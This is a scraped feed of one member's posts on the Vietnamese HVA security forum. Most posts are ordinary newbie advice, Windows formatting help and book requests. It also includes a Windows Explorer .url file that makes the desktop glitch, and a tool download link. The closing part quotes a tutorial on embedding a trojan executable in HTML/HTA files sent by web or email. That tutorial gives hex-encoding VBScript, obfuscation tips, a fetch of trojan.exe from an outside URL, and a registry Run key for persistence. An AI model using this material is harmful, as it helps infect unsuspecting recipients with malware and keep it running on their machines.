GMT Mục "Công cụ" luôn trong tình trạng "đang xây dựng"

conmale wrote:
Không phải không hiểu mà chưa thấy vì chưa mở mà em. Dự kiến phải 1/2 tháng nữa mới tạm đầy đủ cái sườn. Lúc ấy sẽ mở cửa cho các member elite. Thân. 
Thế ạ , thế thì em sẽ cố gắng phấn đấu để trở thành Elite member:)) .Lại những đêm không ngủ rồi đây. 8)) 8)) ]]> /hvaonline/posts/preList/3413/19672.html#19672 /hvaonline/posts/preList/3413/19672.html#19672 GMT hacker?

boy9x wrote:
Ông bạn đã nói thế thì tui cũng nói thật nếu ông bạn đã không muốn trả lời câu hỏi của vinhhoxuan2005 thì thôi chứ sao ông bạn lại kêu người ta đọc lại nội quy ==> vậy xin hỏi ông bạn đã học thuộc lòng nội quy của diễn đàn chưa hay là không thèm đọc 
Tôi có một phương châm thế này : bất kỳ nơi nào tôi đặt chân đến việc đầu tiên tôi phải làm là tôi sẽ tìm hiều về lịch sử của nó và tất nhiên là luật lệ nơi này nữa/ còn việc đọc nội quy tất nhiên tôi đã đọc và không chỉ đọc một lần ,còn có thuộc lòng hay không á? phải nó thật là thuộc từng chữ thì tôi chịu , nhưng những thứ cốt lõi nhất tôi đã lĩnh hội. và tôi cố gắng khi hoạt động trên diễn đàn không vi phạm những nội qui ấy, bạn có thể kiểm tra xem những bài tôi viết ra có bị vào trash hay đã bị mod nhắc nhở vì spam chưa. Hơn nữa ở trên tôi có nhắc bạn vinhhoxuan2005 vi tôi thấy rằng trong cách hỏi của bạn ấy có vài điểm không phù hợp với nội qui lắm.như là hiện giờ tiêu chí của diễn đàn là hướng vào bảo mật. và tôi thiết nghĩ rằng những trò lặt vặt ( làm đứng máy victim ) chỉ phí thời gian cho những người muốn thực sự đi xa . Nên ngay câu sau tôi đã góp ý cho bạn ấy là nên tìm những tài liệu bạn ấy đang cần ở đâu: Như là việc tìm trên diễn đàn hay là việc để thực sự đi xa thì nên đọc : những câu chuyện với rookie của anh conmale. Vậy bạn bảo tôi là không muốn trả lời ở chỗ nào .Tôi đã trả lời cho bạn ấy cách tìm tài liệu và hướng đi cho newbie PHải nói tôi cũng chỉ là Newbie như bao anh em khác trong đây , tôi thiết nghĩ chúng ta nên hướng nhau đi con đường đúng đắn và nền tảng . Nếu như điều đó bạn không thích thì thôi tôi cũng chẳng góp ý thêm làm gì nữa. Vậy nhé]]> /hvaonline/posts/preList/2725/15473.html#15473 /hvaonline/posts/preList/2725/15473.html#15473 GMT hacker?

boy9x wrote:
gì cũng được --- nhưng có người hỏi thì phải có người trả lời chứ ai lại bủn xỉn như legendayhacker & BuRaTiNoVnO Nếu ai mà cũng như 2 ông này thì anh em mình còn biết học thủ thuật của ai nữa  
Cho hỏi bạn định nghĩa từ "bủn xỉn" như thế nào ?? Hỏi tiếp cái nữa là bạn đã đọc kỹ bài của tôi chưa hay chỉ đọc lướt qua ?? bài của tôi như sau: bạn ơi bạn đọc nội qui chưa vậy . hơn nữa những thứ bạn muốn hỏi bạn đã tìm trên diễn đàn chưa thế. Nếu bạn muốn thành cái gì đấy mình góp ý chân thành là đọc bài những câu chuyện với rookie của anh conmale. Tôi đã góp ý chân thành như thế mà bạn bảo tôi bủn xỉn. Hơn nưa tôi nghĩ là bạn chỉ vô đây học : thủ thuật như bạn nói thì uổng quá. Tôi đã góp ý và đưa cho bạn một tài liệu hay đến thế mà bạn còn chê "bủn xỉn" Còn bạn thích step by step thì cũng ok ,có nhiều diễn đàn còn hướng dẫn hay hơn HVA nhiều nhiều ( các bác đừng bảo em nói thế này là chê HVA). Nhưng liệu bạn thu được gì từ những thủ thuật đó , hay chỉ nhắm mắt làm liều được thì được chẳng được thì thôi. Một đề nghị cuối cùng : Bạn nên đọc kỹ bài của người khác và khi post bài thì suy nghĩ một tý"đề nghị chỉ là đề nghị bạn có thực hiện hay không là quyền của bạn" ]]> /hvaonline/posts/preList/2725/15458.html#15458 /hvaonline/posts/preList/2725/15458.html#15458 GMT Kho e-books tiếng việt C.J.Date An introduction to database system , addittion-wesley J.Dullan , Principles of Database and Knowledge-base systems vol1,vol2 ,computer science Computer Network ,Tabanenum Internet working with TCP/IP vol 1,vol2, vol3 Thanks !]]> /hvaonline/posts/preList/1487/15433.html#15433 /hvaonline/posts/preList/1487/15433.html#15433 GMT Kho ebook mở cửa - Link download trực tiếp C.J.Date An introduction to database system , addittion-wesley J.Dullan , Principles of Database and Knowledge-base systems vol1,vol2 ,computer science Computer Network ,Tabanenum Internet working with TCP/IP vol 1,vol2, vol3 Thanks !]]> /hvaonline/posts/preList/2188/15066.html#15066 /hvaonline/posts/preList/2188/15066.html#15066 GMT hacker?

vinhhoxuan2005 wrote:
có ai biết gì về Hacker không vậy? :?:) minh rất muốn biết làm như thế nào để: 1. lấy password. 2. làm đứng máy victim 3. làm thế nào để vào máy victim khi biết 1 địa chỉ IP. 4. ISP là gì? Rất mong quý sư huynh giúp đỡ giùm :cry: LH: vinhhoxuan2005@yahoo.com  
bạn ơi bạn đọc nội qui chưa vậy . hơn nữa những thứ bạn muốn hỏi bạn đã tìm trên diễn đàn chưa thế. Nếu bạn muốn thành cái gì đấy mình góp ý chân thành là đọc bài những câu chuyện với rookie của anh conmale.]]> /hvaonline/posts/preList/2725/15058.html#15058 /hvaonline/posts/preList/2725/15058.html#15058 GMT Re: Gửi anh conmale và các đàn anh...

ddc_online wrote:
nói chung muốn trở thành 1 security trước tiên bạn phải là người hack được thì bạn mới biết FIX chứ nhưng muốn là hacker bạn còn phải có 1 sự thúc đẩy < cái này là do mỗi người lên ko nói lắm>  
Bác này nói khá là mâu thuẫn Thế xin hỏi lại là bác lấy kiến thức nào để mà bác Hack người ta (không lẽ bác sinh ra đã có hết rồi :lol:) :lol:) ) Ít ra bác cần biết bảo mật thì bác mới biết chỗ nào là yếu nhất của hệ thống chỗ nào mà admin có thể không set và nhiều kiến thức khác nữa mới có thể hack đựoc chứ. hay bác nói Hack là theo kiểu Step by Step .Em e cái này không ổn rồi. ]]> /hvaonline/posts/preList/1369/9845.html#9845 /hvaonline/posts/preList/1369/9845.html#9845 GMT Lỗi Windows Explorer - Oái oăm và rất thú vị /hvaonline/posts/preList/1085/9344.html#9344 /hvaonline/posts/preList/1085/9344.html#9344 GMT Lỗi Windows Explorer - Oái oăm và rất thú vị

phamquoc_truong wrote:
Cảnh báo : Đọc đến hết bài hãy thực hành. Áp dụng cho xp, 2003 mọi phiên bản. Trước hết ! bạn hãy bật cmd.exe <== bạn không làm bước này là dở khóc dở cười đó nha. Dùng lệnh cd để chuyển thư mục về desktop của bạn. Okie ! bạn mở notepad ra. Tạo file *.url (ví dụ thu.url chẳng hạn) có nội dung như sau : Code:
[InternetShortcut]
url=file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:
rồi lưu vào desktop. Thế là xong :D Bạn chỉ cần xoá file thu.url bằng lệnh del thu.url mọi thứ sẽ được giải quyết. :D Nguồn : securityfocus HAVE FUN ! 
em đã đọc cái của bác rồi và cố tình không mở cmd xem nó dở khóc dở cười như thế nào .đúng là màn hình có giật cà tưng nhưng hầu như mọi thứ vẫn hoạt động bình thường .Vì nhấn ALT +TAP vẫn có thế đến đựoc cửa sổ khác hơn nữa CTRL + ALT +DEl vẫn hoạt động như thường . Ngoài cách như các bác kia có nói thì em nghĩ ra một cách như sau: đầu tiên nhấn CTRL + ALT +DEl hiện ra Task Manager chọn New task ( run) rồi chuyển đến ổ C ( C:) rồi vào C:\Documents and Settings tìm account của mình vào thư mục desktop xoá file .url kia đi là xong. Có điều ở đây là : Code:
[InternetShortcut]
url=file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:
với code như trên tại sao lại làm xảy ra hiện tượng desktop nhảy cà tưng . bác nào hiểu thì giải thích cho anh em xem nào ]]> /hvaonline/posts/preList/1085/9257.html#9257 /hvaonline/posts/preList/1085/9257.html#9257 GMT Hỏi về cài đăt WindowsXPSP2

TayBac wrote:
- Tại sao rõ ràng mình đã đánh lệnh Format C: /s mà máy lại Format ổ D (là ổ chứa Data của mình vậy?)  
Rõ ràng lần cái Windows trước bạn đã để ổ C có định dạng file system là NTFS mà cái này khi đĩa boot không hỗ trợ nhận dạng NTFS thì sẽ không nhìn thấy nó sẽ ngầm định đẩy tên ổ lên ( nghĩa là D thành C do ổ D bạn để Ở Fat 32 thường và Đĩa boot nhận ra )
- Bây giờ muốn Format ổ C thì phải làm sao ?  
Tạm thời có 2 cách như sau : 1 bạn cho đĩa boot có nhận dạng file system là NTFS nó sẽ nhìn thấy Ổ C thật sự và format bình thường. Hoặc bạn dùng PQ Magic chương trình này sẽ nhận được cả NTFS và bạn chỉ cần chạy chương trình từ đĩa boot ( đĩa boot nào mà trả có chương trình này) sau khi chạy bạn chỉ cần chọn format C thôi ( nó ở chế độ GUI nên dễ sử dụng khỏi cần hướng dẫn ) 2 Trong trường hợp này chắc bạn muốn cài lại Windows đúng không thì nên chọn cách này thì hơn : cứ cho đĩa cài Windows vào chọn bình thường nhưng khi đến đoạn chọn ổ thì chọn ổ C và nó hỏi có Delete không thì có và nó sẽ format theo yêu cầu bạn muốn tốt nhất hiện giờ vẫn nên dùng File system là NTFS vì nhưng ưu điểm không thể phủ nhận của nó .
- Phục hồi lại Data trong ổ D thì dùng chương trình phục hồi dữ liệu nào là tốt nhất ? Mong các bạn ai biết thì giúp mình với. Xin cảm ơn... 
để phục hồi dữ liệu điều kiện tiên quyết là bạn không nên ghi bất cứ thứ gì lên ổ D hiện giờ để tránh xoá mất dữ liệu cũ . còn chương trình thì cứ thử search ở mấy trang như echip xem họ giới thiệu cái nào tốt nhất và cách sử dụng thì dùng thôi .Hiện giờ mình cũng không biết là cái nào là tốt nhất cả nên chỉ góp ý được thế này thôi. Chúc bạn sớm lấy lại data và lần sau nhớ cẩn thận hơn đối với những việc mình làm để tránh hậu quả đáng tiếc có thể xảy ra]]> /hvaonline/posts/preList/1854/9256.html#9256 /hvaonline/posts/preList/1854/9256.html#9256 GMT Kĩ thuật gắn Trojan vào file HTML

dbvn wrote:
ko down dc godwill nen chưa thử dc, có ai có, xin cho link down coi thử nó lợi hại đến đâu 
Đây link đây bạn thử coi .Tôi không khuyến khích bạn phá hoại hãy thử nên chính mình trước để xem kết quả là tốt nhất và để hiểu rõ cách thức của nó http://www.remoteassessment.com/darchive/190982017.html chúc vui]]> /hvaonline/posts/preList/1053/9234.html#9234 /hvaonline/posts/preList/1053/9234.html#9234 GMT Kĩ thuật gắn Trojan vào file HTML /hvaonline/posts/preList/1053/4367.html#4367 /hvaonline/posts/preList/1053/4367.html#4367 GMT Kĩ thuật gắn Trojan vào file HTML ” VD: .doc=”9631447da55abcd44ac25...” · Bước 4: Nhúng file nội dung file temp.htm sau khi sửa vào trang Web hoặc Email và gởi đến cho người khác! 2) Mã nguồn: · Files: § tempsrc.hta dùng để extract và execute trojan.exe § tempsrc.htm file htm chính § convert16.vbp & convert16.frm : file nguồn của chương trình Convert 16, được viết bằng Visual Basic 6, dùng để convert file .exe sang file .hex · Những vấn đề chính: § Kĩ thuật ‘Convert 16’: dùng để tạo 1 file nhị phân, ví dụ như trojan.exe Chuyển mã ANSI của kí tự sang hệ cơ số 16 hexa. Từ mã ANSI của kí tự ở hệ 16 chúng ta dễ dàng chuyển về lại kí tự ban đầu. Để dễ hiểu, tôi đưa ra ví dụ sau: Kí tự L P T V C l u b 2 0 0 1 Mã ANSI ở hệ 10 76 80 84 86 32 67 108 117 98 32 50 48 48 49 Mã ANSI ở hệ 16 4C 50 54 56 20 43 6C 75 62 20 32 30 30 31 Encode16 Decode16 “LPTV Club 2001” “4C50545620436C75622032303031” “LPTV Club 2001” ‘--- VBScript Code --- function encode16(st) for i = 1 to len(st) temp = hex((asc(mid(st,i,1))) ‘ mid(st,i,1) lấy 1 kí tự trong chuổi st ở vị trí thứ i ‘ asc(mid(st,i,1)) trả về mã ANSI của kí tự này ‘ temp = hex((asc(mid(st,i,1))) sẽ chứa mã ANSI ở hệ 16 của kí tự if len(temp) = 1 then ‘vì mã ANSI của kí tự chỉ nằm trong khoảng từ 0 đến 255 (0h-FFh), nên nếu độ dài của temp=1 chúng ta sẽ thêm 0 vào trước! Ví dụ: 0A, 07, ... temp =”0” & temp end if encode16 = encode16 & temp next end function function decode16(st) for i =1 to len(st) step 2 ‘như ở trên, mỗi kí tự được mã bằng đúng 2 kí tự nên bước nhảy step = 2 decode16 = decode16 & chr(“&h” & mid(st,i,2)) ‘ mid(st,i,2) trả về 1 chuổi gồm 2 kí tự, bắt đầu từ vị trí thứ i trong chuổi ‘chr(“&h” & mid(st,i,2)) trả về kí tự có mã ANSI ở hệ 16; “&h” dùng để chỉ hệ 16 next end function ‘--- VBScript Code --- § Kĩ thuật ‘Encode’: được sử dụng trong file temp.hta & temp.htm ü Mục đích: + giảm kích thước file + làm cho mã lệnh khó đọc đối với người khác ü Ví dụ: thay vì viết lệnh rõ ràng: on error resume next dn=chr(34) xd=vbcrlf set wsh=createobject("wscript.shell") set fso=createobject("scripting.filesystemobject") Chúng ta cũng có thể viết lại như sau: on error resume nextj=chr(34)q=vbcrlfset g=createobject("wscript.shell")set t6=createobject("scripting.filesystemobject") Bạn thấy mã lệnh nhỏ hơn trước và có khó đọc không? 3) Hỏi/Đáp: · Có thể gắn virus hoặc 1 chương trình khác thay cho trojan không? Dĩ nhiên là được rồi! Bạn thử nghĩ lại xem, file virus, trojan.exe hầu như đều là các file .exe chương trình có khả năng tự thực thi nên bạn hoàn toàn có thể thay đổi theo ý muốn của bạn! · Nếu tôi gắn 1 file trojan.exe lớn trong file temp.html , file này sẽ lớn kinh khủng, người khác có thể nghi ngờ! Vậy làm sao bây giờ? · Tôi muốn máy họ tự động download file trojan.exe từ trên mạng về và execute nó? Có được không? Rất dễ! Thay vì phải gắn file trojan.exe, chúng ta sẽ gắn 1 file chương trình nhỏ khoảng 5 KB. Nhiệm vụ của file này là download trojan.exe từ http://www.somewhere.com/yoursite/trojan.exe và thi hành nó! Bạn nên sửa lại mã của file .hta một chút!: bỏ lệnh xóa file temp.exe và thêm lệnh tạo registry-startup cho file temp.exe! ... wsh.regwrite “HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Kernel 32”,filetrojan ... Bạn có thể sử dụng chương trình Web Dowloader để giải quyết vấn đề trên! Tôi có gởi kèm chương trình Web Dowloader trong tập hướng dẫn này, file Webdownloader2.0.zip · Có thể chạy trojan.exe ngay sau khi người khác đọc trang Web hoặc Email mà không cần họ khởi động lại máy tính không? Hoàn toàn có thể được! Nhưng trong phạm vi bài viết này, tôi không muốn đề cập đến! Chúc các bạn thành công! ]]> /hvaonline/posts/preList/1053/4359.html#4359 /hvaonline/posts/preList/1053/4359.html#4359 GMT